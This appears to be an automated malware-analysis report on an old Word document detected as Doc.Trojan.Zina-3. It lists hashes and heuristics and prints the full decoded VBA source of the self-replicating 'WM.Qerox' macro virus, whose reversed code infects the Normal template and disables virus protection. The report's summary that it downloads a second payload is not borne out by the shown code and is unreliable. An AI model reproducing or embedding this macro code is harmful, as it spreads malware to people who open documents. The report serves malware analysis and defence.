Office (OLE) malware analysis — malicious · 9f5052724ef1f25a

MALICIOUS

Office (OLE)

52.5 KB Created: 2001-06-10 23:26:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 6728b03f483ff23fb436d7260a5d90b7 SHA-1: 10d5f27653a0e2d2def74d23beeebe5d856198f2 SHA-256: 9f5052724ef1f25a8439eb6a3c60c1e3ab7d4e1fa3bbd73b81ad367ba6728943

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro designed to execute code automatically when the document is opened. Heuristics indicate the macro uses execution tokens and attempts to create objects, suggesting it's designed to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Zina-3' further confirms its malicious nature.

Heuristics 4

ClamAV: Doc.Trojan.Zina-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Zina-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2721 bytes
SHA-256: `7aef83daa9c6b1307ba232df57a42163b1589784586e471d98011b40afdc2031`
Detection ClamAV: Doc.Trojan.Zina-3 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'String2K Dim a23489245, b23489234, c76394729, d39848275, e72945601, f92038476 Dim g50385723, h84729645, i84729645, j40395423, k02391836, l20654583, m29387656 Dim n74359023, o09324687, p98734985, r90809564 Private Sub Document_Open() 'etalpmeTlamroN.noitacilppA = 43298432b teS :tnemucoDevitcA.noitacilppA = 54298432a teS ')57284893d - 57284893d( = noitcetorPsuriV.snoitpO :1 = 57284893d :tnemucoDsihT = 92749367c teS 'eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.43298432b = 63819320k teS 'eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.54298432a = 32095347n teS '_ ,57284893d(seniL.eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.92749367c = 10654927e ')senilfotnuoc.eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.92749367c 'nehT "K2gnirtS'" >< )57284893d ,57284893d(seniL.63819320k fI 'senilfotnuoc.63819320k ,57284893d senileteled.63819320k '10654927e gnirtsmorfdda.63819320k 'fI dnE 'nehT "K2gnirtS'" >< )57284893d ,57284893d(seniL.32095347n fI 'senilfotnuoc.32095347n ,57284893d senileteled.32095347n '10654927e gnirtsmorfdda.32095347n 'fI dnE End Sub Private Sub document_close(): h84729645 = "'": d39848275 = 1: Dim a23, b34 If Left(ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(17, d39848275), d39848275) = h84729645 Then For j40395423 = 6 To 19 m29387656 = Right(ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(j40395423, d39848275), Len(ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(j40395423, d39848275)) - d39848275) ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.replaceline j40395423, m29387656 Next For o09324687 = 6 To 19 p98734985 = ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(o09324687, d39848275) r90809564 = StrReverse(p98734985): ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.replaceline o09324687, r90809564: r90809564 = "" Next End If Document_Open If Left(ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(d39848275 + 6, d39848275), d39848275) <> h84729645 Then For g50385723 = 6 To 19: i84729645 = ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(g50385723, d39848275) l20654583 = StrReverse(i84729645) ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.replaceline g50385723, h84729645 & l20654583 l20654583 = "" Next End If End Sub 'Virus Name: WM.Qerox 'Author Name: Specie 'SRME v1.0 by Specie [String Reverse Mutation Engine]

Open this report in the interactive analyzer, or submit your own file for analysis.